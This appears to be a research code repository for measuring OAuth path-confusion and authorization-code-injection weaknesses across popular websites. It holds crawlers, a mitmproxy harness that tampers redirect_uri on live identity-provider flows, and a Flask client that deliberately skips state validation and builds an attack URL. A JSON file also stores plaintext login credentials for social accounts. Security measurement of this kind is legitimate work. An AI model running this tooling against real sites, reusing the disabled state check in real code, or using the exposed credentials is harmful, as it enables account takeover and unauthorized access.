├── Pathconfusion-attacklist.json ├── requirements.txt ├── convert.sh ├── merge-sites-files.py ├── dump_http.py ├── login.html ├── Idps_info.json ├── attack.html ├── idp_keywords.json ├── generate-sites-files.py ├── Smallsetofsites.json ├── launcher.py ├── facebook.py ├── Start-PathConfusion-exp.py ├── verifysites.js ├── Start-SitesVerification.py ├── tamper_http_header-path_conf.py ├── README.md ├── Pup-Crawler.js └── idps-identification.py /Pathconfusion-attacklist.json: -------------------------------------------------------------------------------- 1 | {"Add_and_Remove1":"/FAKEPATH/", 2 | "Add_and_Remove2":"/FAKEPATH2/" 3 | } -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.12.2 2 | Requests==2.31.0 3 | selenium==4.11.2 4 | urllib3==1.26.15 5 | tldextract==3.6.0 6 | Flask-Cors==4.0.0 7 | -------------------------------------------------------------------------------- /convert.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | python3 generate-sites-files.py --sites $1 4 | echo "Generated single JSON files for each site." 5 | 6 | python3 merge-sites-files.py 7 | echo "Merged single JSON files into a single one." 8 | -------------------------------------------------------------------------------- /merge-sites-files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | ''' 8 | Take all the single files in the json folder 9 | and merge them into a list to dump in a single file 10 | ''' 11 | 12 | import glob 13 | import json 14 | 15 | if __name__ == '__main__': 16 | json_files = glob.glob('json/*.json') 17 | 18 | data = [] 19 | for json_file in json_files: 20 | with open(json_file) as f: 21 | data.append(json.load(f)) 22 | 23 | with open('json/sites.json', 'w') as f: 24 | json.dump(data, f) # Note: no indentation here otherwise the file might get extremely big 25 | -------------------------------------------------------------------------------- /dump_http.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | import sys 4 | 5 | 6 | 7 | def get_headers(headers): 8 | hdrs = {} 9 | 10 | for name, value in headers: 11 | hdrs[name.decode('utf-8')] = value.decode('utf-8') 12 | 13 | return hdrs 14 | 15 | def get_content(content): 16 | if content: 17 | return content.decode('utf-8') 18 | else: 19 | return "No-Content" 20 | 21 | 22 | def response(flow): 23 | print(json.dumps({ 24 | 'request': { 25 | 'timestamp_start': flow.request.timestamp_start, 26 | 'timestamp_end': flow.request.timestamp_end, 27 | 'method': flow.request.method, 28 | 'url': flow.request.url, 29 | 'headers': get_headers(flow.request.headers.fields), 30 | 'content': get_content(flow.request.content) 31 | }, 32 | 'response': { 33 | 'timestamp_start': flow.response.timestamp_start, 34 | 'timestamp_end': flow.response.timestamp_end, 35 | 'status_code': flow.response.status_code, 36 | 'status_text': flow.response.reason, 37 | 'headers': get_headers(flow.response.headers.fields), 38 | 'content': get_content(flow.response.content) 39 | } 40 | })+",", file=sys.stdout) 41 | -------------------------------------------------------------------------------- /login.html: 
--------------------------------------------------------------------------------
[The HTML markup of this Jinja2 template was stripped during extraction; only its visible
text survives. Recoverable content: page title "{% block title %}{% endblock %}Login with
{{ provider }}", a "Home" link, a "Login with {{ provider }}" heading, and an
"Authorization request" section whose login/authorization form markup is lost.]
36 | -------------------------------------------------------------------------------- /Idps_info.json: -------------------------------------------------------------------------------- 1 | {"facebook.com":{ 2 | "Username":"tommycall.text@gmail.com", 3 | "Password":"Boston2021", 4 | "Fill":{ 5 | "User-Type": "ID", 6 | "Pass-Type": "ID", 7 | "Form-User": "email", 8 | "Form-Pass": "pass" 9 | }, 10 | "Submit":{ 11 | "Button-Type": "ID", 12 | "Button": "loginbutton" 13 | }, 14 | "Grant":{ 15 | "Button-Type": "QuerySelector", 16 | "Button": "div[aria-label*='ontinua']" 17 | } 18 | }, 19 | "twitter.com":{ 20 | "Username":"tommycall.text@gmail.com", 21 | "Password":"Boston2021", 22 | "Fill":{ 23 | "User-Type":"ID", 24 | "Pass-Type":"ID", 25 | "Form-User":"username_or_email", 26 | "Form-Pass":"password" 27 | }, 28 | "Submit":{ 29 | "Button-Type":"ID", 30 | "Button":"allow" 31 | }, 32 | "Grant":{ 33 | "Button-Type":"XPath", 34 | "Button":"//div[contains(@aria-label,'ontinua')]" 35 | } 36 | }, 37 | "line.me":{ 38 | "Username":"tommycall.text@gmail.com", 39 | "Password":"Boston2021", 40 | "Fill":{ 41 | "User-Type":"exception", 42 | "Pass-Type":"exception", 43 | "Form-User":"fill%%Name%%tid%%tommycall.text@gmail.com%%login", 44 | "Form-Pass":"fill%%Name%%tpasswd%%Boston2021%%login" 45 | }, 46 | "Submit":{ 47 | "Button-Type":"XPath", 48 | "Button":"//*[contains(text(), \"Log in\") or contains(@value,'Log in')]" 49 | }, 50 | "Grant":{ 51 | "Button-Type":"XPath", 52 | "Button":"//*[contains(text(), \"Allow\")]" 53 | } 54 | }} -------------------------------------------------------------------------------- /attack.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {% block title %}{% endblock %}Login with {{ provider }} 4 | 5 | 6 | Home 7 |

[As with login.html, the markup of this template was stripped during extraction; only its
visible text survives. Recoverable content after the "Home" link above: a
"Login with {{ provider }}" heading, a "Code & State" section showing "Code {{ code }}" and
"State {{ state }}", an "OPP Attack URL" section displaying {{ attack_URL }}, and a
"Redeem request" section whose form markup is lost.]
45 | 46 | 47 | 48 | 60 | -------------------------------------------------------------------------------- /idp_keywords.json: -------------------------------------------------------------------------------- 1 | {"atlassian.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"bitbucket.org","Url_Prefix":["bitbucket.org/site/oauth2/authorize?","bitbucket.org/api/"]}, 2 | "github.com":{"Keywords":["redirect_uri"],"idphostname":"github.com","Url_Prefix":["github.com/login/oauth/authorize?"]}, 3 | "vk.com":{"Keywords":["redirect_uri"],"idphostname":"vk.com","Url_Prefix":["oauth.vk.com/authorize","api.vk.com/oauth/authorize?"]}, 4 | "linkedin.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"linkedin.com","Url_Prefix":["linkedin.com/oauth/v2/authorization?"]}, 5 | "line.me":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"line.me","Url_Prefix":["access.line.me/oauth2/"]}, 6 | "ok.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"ok.ru","Url_Prefix":["connect.ok.ru/oauth/authorize"]}, 7 | "microsoftonline.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"microsoftonline.com","Url_Prefix":["login.microsoftonline.com/common/oauth2/"]}, 8 | "live.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"live.com","Url_Prefix":["login.live.com/oauth20_authorize.srf"]}, 9 | "facebook.com":{"Keywords":["redirect_uri","client_id"],"idphostname":"facebook.com","Url_Prefix":["/dialog/oauth"]}, 10 | "orcid.org":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"orcid.org","Url_Prefix":["orcid.org/oauth/authorize?"]}, 11 | "slack.com":{"Keywords":["redirect_uri","state","client_id"],"idphostname":"slack.com","Url_Prefix":["slack.com/oauth"]}, 12 | "yandex.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yandex.ru","Url_Prefix":["oauth.yandex.ru/authorize"]}, 13 | "yahoo.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yahoo.com","Url_Prefix":["api.login.yahoo.com/oauth2/request_auth?"]}, 14 | "reddit.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"reddit.com","Url_Prefix":["/ssl.reddit.com/api/"]}, 15 | "twitter.com":{"Keywords":["oauth_token"],"idphostname":"twitter.com","Url_Prefix":["api.twitter.com/oauth/authenticate"]}, 16 | "kakao.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"kakao.com","Url_Prefix":["kauth.kakao.com/oauth/authorize"]} 17 | } -------------------------------------------------------------------------------- /generate-sites-files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | import argparse 8 | import logging 9 | import glob 10 | import json 11 | import csv 12 | import os 13 | 14 | ''' 15 | For each site crawled, generate a JSON file with the following structure: 16 | 17 | { 18 | 'site': '', 19 | 'ranking': '', 20 | 'loginpages': [{ 21 | 'loginpage': '', 22 | 'SSOs': [ 23 | { 24 | 'provider': 'google', 25 | 'attributes': [{ 26 | 'name': 'class', 27 | 'value': 'grid--cell s-btn s-btnicon s-btngoogle bar-md ba bc-black-100' 28 | }, { 29 | 'name': 'data-oauthserver', 30 | 'value': 'https://accounts.google.com/o/oauth2/auth' 31 | }, { 32 | 'name': 'data-oauthversion', 33 | 'value': 
'2.0' 34 | }, { 35 | 'name': 'data-provider', 36 | 'value': 'google' 37 | }], 38 | 'tag': 'button', 39 | 'dompath': '//html/body/div[3]/div[2]/div[1]/div[2]/button[1]' 40 | }, ... 41 | ] 42 | }, ... 43 | ] 44 | } 45 | ''' 46 | 47 | if __name__ == '__main__': 48 | parser = argparse.ArgumentParser(description='Generate JSON files for each site crawled.') 49 | 50 | parser.add_argument('-s', '--sites', help='Tranco ranking csv file', required=True) 51 | parser.add_argument('-d', '--debug', action='store_true', help='Verbose output') 52 | args = parser.parse_args() 53 | 54 | if args.debug: 55 | logging.basicConfig(level=logging.DEBUG) 56 | else: 57 | logging.basicConfig(level=logging.INFO) 58 | 59 | if not os.path.exists('json'): 60 | os.makedirs('json') 61 | 62 | clean_dictionary = { 63 | 'site': '', 64 | 'ranking': '', 65 | 'loginpages': [] 66 | } 67 | 68 | tranco = {} 69 | 70 | with open(args.sites, 'r') as f: 71 | reader = csv.reader(f) 72 | 73 | for row in reader: 74 | tranco[row[1]] = int(row[0]) 75 | 76 | for filename in glob.glob('links/*'): 77 | with open(filename, 'r') as f: 78 | links = json.load(f) 79 | 80 | output = clean_dictionary.copy() 81 | 82 | output['site'] = links['site'] 83 | output['ranking'] = str(tranco[links['site']]) if links['site'] in tranco else '-1' 84 | output['loginpages'] = [] 85 | if len(links['login']) > 0: 86 | for login in links['login']: 87 | idps_loginpage = links['login'][login] 88 | 89 | loginpage = { 90 | 'loginpage': login, 91 | 'SSOs': [] 92 | } 93 | 94 | for provider in idps_loginpage: 95 | data = { 96 | 'provider': provider 97 | } 98 | if 'xpath' in idps_loginpage[provider]: 99 | data['xpath'] = idps_loginpage[provider]['xpath'] 100 | if 'tag' in idps_loginpage[provider]: 101 | data['tag'] = idps_loginpage[provider]['tag'] 102 | if 'url' in idps_loginpage[provider]: 103 | data['url'] = idps_loginpage[provider]['url'] 104 | loginpage['SSOs'].append(data) 105 | 106 | output['loginpages'].append(loginpage) 107 | 108 | with open('json/' + links['site'] + '.json', 'w') as f: 109 | json.dump(output, f, indent=4) 110 | 111 | logging.debug('Done.') 112 | -------------------------------------------------------------------------------- /Smallsetofsites.json: -------------------------------------------------------------------------------- 1 | [{"site": "naver.com", "ranking": "98", "loginpages": [{"loginpage": "https://nid.naver.com/nidlogin.login", "SSOs": [{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}, {"provider": "line.me", "xpath": "//a/*[contains(text(), \"Line\")]", "tag": "Line", "url": "https://nid.naver.com/oauth/global/initSNS.nhn?idp_cd=line&locale=en_US&svctype=1&postDataKey=&url=https%3A%2F%2Fwww.naver.com"}, {"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}]}]}, 2 | {"site": "medium.com", "ranking": "68", "loginpages": [{"loginpage": "https://medium.com/m/signin", "SSOs": [{"provider": "twitter.com", "xpath": "//a/*[contains(text(), \"Sign in with Twitter\")]", "tag": "
Sign in with Twitter
", "url": "https://medium.com/m/account/authenticate-twitter?state=twitter-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"},{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Sign in with Facebook\")]", "tag": "
Sign in with Facebook
", "url": "https://medium.com/m/connect/facebook?state=facebook-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"}]}]}, 3 | {"site": "wix.com", "ranking": "127", "loginpages": [{"loginpage": "https://users.wix.com/signin?postLogin=https%3A%2F%2Fwww.wix.com%2Fmy-account%2Fsites&view=sign-up&sendEmail=true&loginCompName=Get%20Started%20F1&referralInfo=Get%20Started%20F1", "SSOs": [{"provider": "facebook.com", "xpath": "//button/*[contains(text(), \"Continue with Facebook\")]", "tag": ""}]}]} 4 | ] -------------------------------------------------------------------------------- /launcher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | from time import sleep 8 | 9 | import subprocess 10 | import traceback 11 | import argparse 12 | import logging 13 | import random 14 | import shlex 15 | import json 16 | import sys 17 | import os 18 | 19 | MAX = 5 # Max number of processes to run at once 20 | crawler = 'idps-identification.py' 21 | 22 | # Tested sites 23 | tested = [] 24 | 25 | if __name__ == '__main__': 26 | parser = argparse.ArgumentParser(prog='launcher.py', description='Launch the crawler on a list of sites') 27 | 28 | parser.add_argument('-s', '--sites', 29 | help='Sites list in csv format with two columns ', required=True) 30 | parser.add_argument('-m', '--max', default=MAX, 31 | help=f'Maximum number of sites to test concurrently (default: {MAX})') 32 | parser.add_argument('-a', '--arguments', default='', 33 | help='Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")') 34 | parser.add_argument('-t', '--testall', default=False, 35 | help='Test also already tested sites', action='store_true') 36 | parser.add_argument('-c', '--crawler', default=crawler, 37 | help='Alternative crawler script name to launch') 38 | parser.add_argument('-d', '--debug', action='store_true', 39 | help='Enable debug mode') 40 | 41 | args = parser.parse_args() 42 | 43 | if args.max: 44 | MAX = int(args.max) 45 | 46 | logging.basicConfig() 47 | logger = logging.getLogger('launcher') 48 | logger.setLevel(logging.INFO) 49 | if args.debug: 50 | logger.setLevel(logging.DEBUG) 51 | 52 | # Retrieve already tested sites from tested.json file 53 | if not args.testall and os.path.exists(f'logs/tested.json'): 54 | with open(f'logs/tested.json', 'r') as f: 55 | tested = json.load(f) 56 | 57 | if len(tested) > 0: 58 | random.shuffle(tested) 59 | logger.info(f'Already tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' + 60 | f'... 
and {len(tested) - min(len(tested), 10)} more') 61 | 62 | denylist = ['google', 'facebook', 'amazon', 'twitter', '.gov', 'acm.com', 'jstor.org', 'arxiv'] 63 | 64 | sites = [] 65 | try: 66 | with open(args.sites, 'r') as f: 67 | sites = [s.strip() for s in f.readlines()] 68 | 69 | random.shuffle(sites) 70 | 71 | processes = {} 72 | 73 | for site in sites: 74 | if any(i in site for i in denylist): 75 | continue 76 | try: 77 | rank = int(site.strip().split(',')[0]) 78 | site = site.strip().split(',')[1] 79 | 80 | first = True # Execute the loop the first time regardless 81 | # Loop until we have less than MAX processes running 82 | while len(processes) >= MAX or first: 83 | first = False 84 | 85 | for s in processes.keys(): 86 | state = processes[s].poll() 87 | 88 | if state is not None: # Process has finished 89 | del processes[s] 90 | logger.info(f'[{len(tested)}/{len(sites)} ({len(tested)/len(sites)*100:.2f}%)] {s} tested, exit-code: {state}.') 91 | if state == 0: 92 | tested.append(s) 93 | with open(f'logs/tested.json', 'w') as f: 94 | json.dump(tested, f) 95 | break 96 | sleep(1) 97 | 98 | if site in tested and not args.testall: 99 | continue 100 | 101 | # When we have less than MAX processes running, launch a new one 102 | if site != '' and site not in tested: 103 | cmd = f'python3 {args.crawler} -t {site} {args.arguments}' 104 | logger.info(f'Testing {site}') 105 | try: 106 | p = subprocess.Popen(shlex.split(cmd)) 107 | processes[site] = p 108 | 109 | #p = subprocess.Popen(shlex.split('python3 sleep-print.py ' + site)) 110 | #processes[site] = p 111 | 112 | print('\t\t >>>', cmd) 113 | except subprocess.TimeoutExpired as e: 114 | logger.error(f'Timeout expired for {site}') 115 | except subprocess.CalledProcessError as e: 116 | logger.error(f'Could not test site {site}') 117 | except Exception as e: 118 | logger.error(f'Could not test site {site}') 119 | traceback.print_exc() 120 | except Exception as e: 121 | logger.error(f'Error [{site}] {e}') 122 | traceback.print_exc() 123 | except KeyboardInterrupt: 124 | logger.error('Keyboard interrupt') 125 | except: 126 | logger.error(traceback.format_exc()) 127 | finally: 128 | logger.info(f'Tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' + 129 | f'... and {len(tested) - min(len(tested), 10)} more') 130 | with open(f'logs/tested.json', 'w') as f: 131 | json.dump(tested, f) 132 | -------------------------------------------------------------------------------- /facebook.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, Response, request, make_response, redirect, render_template, jsonify 2 | from flask import session as login_session 3 | from flask_cors import CORS 4 | 5 | from urllib.parse import urlparse, urlunparse 6 | import requests 7 | import random 8 | import string 9 | import json 10 | 11 | app = Flask(__name__) 12 | CORS(app) 13 | 14 | DO_NOT_CHECK_STATE = True 15 | 16 | ngrok = 'https://4406-2-37-67-76.ngrok.io' 17 | authorization_base_url = 'https://www.facebook.com/v16.0/dialog/oauth' 18 | token_url = 'https://graph.facebook.com/v16.0/oauth/access_token' 19 | request_url = 'https://graph.facebook.com/v16.0/me' 20 | redirect_uri = f'{ngrok}/login/oauth/authorize' 21 | 22 | client_id = '937387930629121' 23 | client_secret = 'REDACTED' 24 | scope = 'email' 25 | inject_code = '1234567890' 26 | 27 | # Login page 28 | @app.route('/', methods=['GET']) 29 | def show_login(): 30 | """ 31 | Show the login page and create the random state parameter. 
32 | If the user is authenticated, redirect to the main page. 33 | """ 34 | print(f'show_login(), session: {login_session}') 35 | if 'access_token' in login_session: 36 | return redirect('/index') 37 | state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32)) 38 | login_session['state'] = state 39 | #return jsonify(state=state) 40 | return render_template('login.html', state=state, provider='Facebook') 41 | 42 | # 1. Send initial request to get permissions from the user 43 | @app.route('/handleLogin', methods=["GET"]) 44 | def handleLogin(): 45 | ''' 46 | Make the first request to get authorization from the user. 47 | ''' 48 | # Check if there's a passed callback URL 49 | if 'callback' in request.args: 50 | if request.args.get('callback').startswith('/'): 51 | _redirect_uri = redirect_uri + request.args.get('callback')[1:] 52 | else: 53 | _redirect_uri = redirect_uri + request.args.get('callback') 54 | else: 55 | _redirect_uri = redirect_uri 56 | 57 | # Check that the state parameter is valid 58 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'): 59 | # Get the authorization code 60 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 61 | f'&scope={scope}' + \ 62 | f'&response_type=code' + \ 63 | f'&redirect_uri={_redirect_uri}' 64 | return redirect(url) 65 | else: 66 | return jsonify(invalid_state_token="invalid_state_token") 67 | 68 | # 1. Redeem tests: send authorization request 69 | @app.route('/authorize', methods=["GET"]) 70 | def authorize(): 71 | ''' 72 | Make the first request to get authorization from the user. 73 | ''' 74 | if 'test' in request.args: 75 | test = request.args.get('test') 76 | else: 77 | test = 'genuine' 78 | 79 | _redirect_uri = '' 80 | if test == 'genuine': 81 | _redirect_uri = f'{redirect_uri}' 82 | 83 | elif test == 'code_injection': 84 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}' 85 | 86 | elif test == 'code_injection_path_confusion': 87 | _redirect_uri = f'{redirect_uri}/FAKEPATH' 88 | 89 | # Get the authorization code 90 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 91 | f'&response_type=code' + \ 92 | f'&scope={scope}' + \ 93 | f'&redirect_uri={_redirect_uri}' 94 | return redirect(url) 95 | 96 | # /login/oauth/authorize 97 | #2. 
Using the /callback route to handle authentication 98 | @app.route('/login/oauth/authorize', methods=['GET', 'POST']) 99 | def handle_callback_login(): 100 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'): 101 | if 'state' not in login_session: 102 | return render_template( 103 | 'attack.html', attack_URL='', 104 | provider='Facebook', 105 | code=request.args.get('code'), 106 | state=request.args.get('state') 107 | ) 108 | if 'code' in request.args: 109 | # Create an attack URL to redirect the user to by injecting the received code into the redirect_URI 110 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{request.args.get("code")}' 111 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 112 | f'&response_type=code' + \ 113 | f'&scope={scope}' + \ 114 | f'&redirect_uri={_redirect_uri}' 115 | return render_template( 116 | 'attack.html', attack_URL=url, 117 | provider='Facebook', 118 | code=request.args.get('code'), 119 | state=request.args.get('state') 120 | ) 121 | else: 122 | return jsonify(error="404_no_code"), 404 123 | else: 124 | return jsonify(invalid_state_token="invalid_state_token") 125 | 126 | @app.route('/redeem', methods=['GET']) 127 | def redeem(): 128 | ''' 129 | Redeem the authorization code for an access token. 130 | ''' 131 | if 'code' in request.args: 132 | if 'test' in request.args: 133 | test = request.args.get('test') 134 | else: 135 | test = 'genuine' 136 | 137 | _redirect_uri = '' 138 | if test == 'genuine': 139 | _redirect_uri = f'{redirect_uri}' 140 | 141 | elif test == 'code_injection': 142 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}' 143 | 144 | elif test == 'code_injection_path_confusion': 145 | _redirect_uri = f'{redirect_uri}/FAKEPATH' 146 | 147 | # Redeem the authorization code for an access token 148 | url = f'{token_url}?' + \ 149 | f'client_id={client_id}&client_secret={client_secret}' + \ 150 | f'&code={request.args.get("code")}' + \ 151 | f'&redirect_uri={_redirect_uri}' + \ 152 | f'&grant_type=authorization_code' 153 | r = requests.get(url) 154 | 155 | print(f'redeem: {url}') 156 | 157 | try: 158 | return jsonify(r.json()) 159 | except AttributeError: 160 | app.logger.debug('error redeeming the code') 161 | return jsonify(response=r.text), 500 162 | else: 163 | return jsonify(error="404_no_code"), 404 164 | 165 | # 3. 
Get user information from GitHub 166 | @app.route('/index') 167 | def index(): 168 | print(f'index, session: {login_session}') 169 | # Check for access_token in session 170 | if 'access_token' not in login_session: 171 | return 'You are not authenticated', 404 172 | 173 | # Retrieve user information from the API 174 | url = request_url 175 | r = requests.get(url, 176 | params={ 177 | 'access_token': login_session['access_token'], 178 | 'client_id': client_id, 179 | 'client_secret': client_secret, 180 | 'redirect_uri': redirect_uri 181 | }) 182 | try: 183 | response = r.json() 184 | return jsonify(response=response) 185 | 186 | except AttributeError: 187 | app.logger.debug('error getting the information') 188 | return "Error retrieving the information", 500 189 | 190 | @app.errorhandler(404) 191 | def page_not_found(e): 192 | return jsonify(request.args), 404 193 | # if 'error' in request.args and 'redirect_uri_mismatch' in request.args.get('error'): 194 | # return jsonify(request.args) 195 | # else: 196 | 197 | if __name__ == '__main__': 198 | app.secret_key = 'super_secret_key' 199 | app.run(debug=True, port=8081) 200 | -------------------------------------------------------------------------------- /Start-PathConfusion-exp.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from subprocess import PIPE 3 | from subprocess import TimeoutExpired 4 | import urllib.parse 5 | import re,time,json,os,sys 6 | import hashlib 7 | 8 | 9 | def Identify_SSO_idp(idp,SSO): 10 | sso=[] 11 | for i in SSO: 12 | if i["provider"]==idp: 13 | sso.append(i) 14 | return sso 15 | 16 | 17 | if __name__ == "__main__": 18 | #input experiment:Login pages, IDP to test,output folder 19 | sites = json.load(open(sys.argv[1],'r')) 20 | outputfolder=sys.argv[2] 21 | Pathconf=json.load(open(sys.argv[3])) 22 | keyword_Pathconf=json.load(open(sys.argv[4])) 23 | Idp_info=json.load(open(sys.argv[5])) 24 | measurement= "pathconfusion-fixsitesaddremove3" 25 | 26 | #for each site obatin SSO and modify it,run MITM proxy,Run login crawler. 
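    #Usage sketch (positional arguments read via sys.argv above):
    #  python3 Start-PathConfusion-exp.py <verified sites json> <output folder> Pathconfusion-attacklist.json idp_keywords.json Idps_info.json
    #For each (site, IdP, payload) the loop below assembles a mitmdump command; e.g. for
    #facebook.com with the "/FAKEPATH/" payload from Pathconfusion-attacklist.json, the
    #keywords and URL prefixes come from idp_keywords.json and the command is roughly:
    #  mitmdump --set listen_port=7777 --set http2=false -s tamper_http_header-path_conf.py
    #    --set save_stream_file=<site>-facebook.com-<hash>-stream
    #    --set keywords0=redirect_uri --set keywords1=client_id
    #    --set inject=/FAKEPATH/ --set linkprefix0=/dialog/oauth --set idphostname=facebook.com
    #(<site> and <hash> stand for the site name and login-page hash computed below.)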
27 | 28 | Site_analyzed=[] 29 | restart=False 30 | start_time = time.time() 31 | #Path output result 32 | main_path=outputfolder 33 | if not os.path.exists(main_path): 34 | os.makedirs(main_path) 35 | else: 36 | print("directory alredy present do not override") 37 | 38 | #for each pathc conf 39 | for p in Pathconf: 40 | print(f'start analyze pathconfusion:{Pathconf[p]}') 41 | #Path output pathconfusion 42 | gen_path=main_path+"/"+p 43 | if not os.path.exists(gen_path): 44 | os.makedirs(gen_path) 45 | else: 46 | print("directory alredy present do not override") 47 | 48 | Site_analyzed=[] 49 | fractionate=0 50 | for site in sites: 51 | if(not site['loginpages']): 52 | print(f'Site{site["site"]} without login pages') 53 | continue 54 | #use to space measurement 55 | fractionate+=1 56 | for l in site['loginpages']: 57 | #no SSO move to next login page 58 | if(len(l["SSOs"])==0):continue 59 | print(f'Test path confusion {p} for idp:{l["SSOs"][0]["provider"]} on site: {site["site"]}') 60 | 61 | accIdP=[] 62 | for k in l["SSOs"]: 63 | if(k["provider"]not in accIdP): 64 | accIdP.append(k["provider"]) 65 | 66 | Idp_sso=[] 67 | for a in accIdP: 68 | Idp_sso.extend(Identify_SSO_idp(a,l["SSOs"])) 69 | 70 | if(Idp_sso==[]):continue 71 | for s in Idp_sso: 72 | refineidp=s["provider"] 73 | Idp=refineidp 74 | commands=[] 75 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest() 76 | namefile=str(site["site"])+"-"+str(s["provider"])+"-"+str(pagehash) 77 | 78 | if(s["provider"]not in Idp_info.keys()): 79 | print(f'Provider {s["provider"]} not included skipß it') 80 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f: 81 | f.write("IDP not implemented!!!\nRESULT-EXPERIMENT:-1") 82 | continue 83 | 84 | if(s["provider"]not in keyword_Pathconf.keys()): 85 | print(f'Provider {s["provider"]} not included in idps keywords skip it') 86 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f: 87 | f.write("Keywords of IDP not present!!!\nRESULT-EXPERIMENT:-1") 88 | continue 89 | 90 | print(f'Testing site:{site["site"]} idp:{s["provider"]} and path confusion:{Pathconf[p]} in login page: {l["loginpage"]}') 91 | Site_analyzed.append(namefile) 92 | 93 | #build string for mitmproxy 94 | cmd=["mitmdump","--set","listen_port=7777", 95 | "--set","http2=false", 96 | "-s","tamper_http_header-path_conf.py"] 97 | 98 | stream="save_stream_file="+namefile+"-stream" 99 | cmd.append("--set") 100 | cmd.append(stream) 101 | 102 | Idp_keywords=keyword_Pathconf[refineidp]["Keywords"] 103 | Idp_url_prefix=keyword_Pathconf[refineidp]["Url_Prefix"] 104 | 105 | 106 | for k in range(len(Idp_keywords)): 107 | cmd.append("--set") 108 | cmd.append("keywords"+str(k)+"="+str(Idp_keywords[k])) 109 | cmd.append("--set") 110 | cmd.append("inject="+str(Pathconf[p])) 111 | for r in range(len(Idp_url_prefix)): 112 | cmd.append("--set") 113 | cmd.append("linkprefix"+str(r)+"="+str(Idp_url_prefix[r])) 114 | 115 | cmd.append("--set") 116 | cmd.append("idphostname="+str(keyword_Pathconf[refineidp]["idphostname"])) 117 | 118 | print(cmd) 119 | #save command 120 | commands.append("command for proxy:") 121 | commands.append(cmd) 122 | 123 | #start proxy 124 | Proxy_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 125 | print("proxy started") 126 | 127 | time.sleep(2) 128 | #build parameter file for crawler 129 | paramfile="paramfile.json" 130 | paramters={ 131 | "site":l["loginpage"], 132 | "idp": Idp, 133 | "measurement": measurement, 134 | "idp_info":Idp_info[Idp], 135 | 
"xpath":s["xpath"], 136 | "name":namefile, 137 | "outpath":gen_path+"/" 138 | } 139 | 140 | #save params 141 | commands.append("parameters for crawler:") 142 | commands.append(paramters) 143 | 144 | with open(paramfile, 'w') as f: 145 | json.dump(paramters,f) 146 | 147 | #parameter file 148 | cmd=["node","Pup-Crawler.js"] 149 | cmd.append("--parameters="+paramfile) 150 | 151 | #save command 152 | commands.append("command for crawler:") 153 | commands.append(cmd) 154 | #save command used for the experiment 155 | with open(namefile+"-commands.txt", 'w') as f: 156 | for c in commands: 157 | f.write(str(c)) 158 | f.write('\n') 159 | 160 | #wait to let proxy be ready 161 | time.sleep(2) 162 | 163 | #start crawler 164 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 165 | print("crawler started") 166 | 167 | #wait the crawler to terminate and get return code 168 | try: 169 | crawlresult=Crawler_subproc.wait(timeout=120 ) 170 | except TimeoutExpired: 171 | print("crawler blocked kill it and go ahead") 172 | crawlresult=Crawler_subproc.kill() 173 | print(f'print result crawler:{crawlresult}') 174 | outs=Crawler_subproc.stdout 175 | buff=outs.read() 176 | print(f'output of crawler:{buff}') 177 | #save crawler output 178 | with open(namefile+"-crawlerlog.txt", 'w') as f: 179 | f.write(buff) 180 | 181 | time.sleep(2) 182 | proxyresult = Proxy_subproc.terminate() 183 | print(f'print result PROXY:{proxyresult}') 184 | #obtain proxy log 185 | 